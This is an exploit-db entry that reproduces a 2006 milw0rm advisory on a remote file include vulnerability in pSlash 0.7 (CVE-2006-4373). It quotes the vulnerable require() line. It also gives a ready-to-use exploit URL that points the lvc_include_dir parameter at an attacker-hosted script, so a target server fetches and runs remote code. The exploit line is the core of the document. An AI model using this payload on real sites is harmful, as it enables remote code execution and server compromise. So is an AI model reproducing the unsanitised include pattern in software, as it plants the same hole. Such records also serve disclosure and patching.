pSlash 0.7 lvc_include_dir Remote File Include Vulnerability

2006-08-23T00:00:00
ID EDB-ID:2249
Type exploitdb
Reporter Mehmet Ince
Modified 2006-08-23T00:00:00

Description

pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability. CVE-2006-4373. Webapps exploit for php platform

                                        
                                            ############################################################

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  require($lvc_include_dir.'db/db_mysql.inc.php');

############################################################

#Exploit:
http://www.site.com/[path]/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, sakkkure

############################################################

# milw0rm.com [2006-08-23]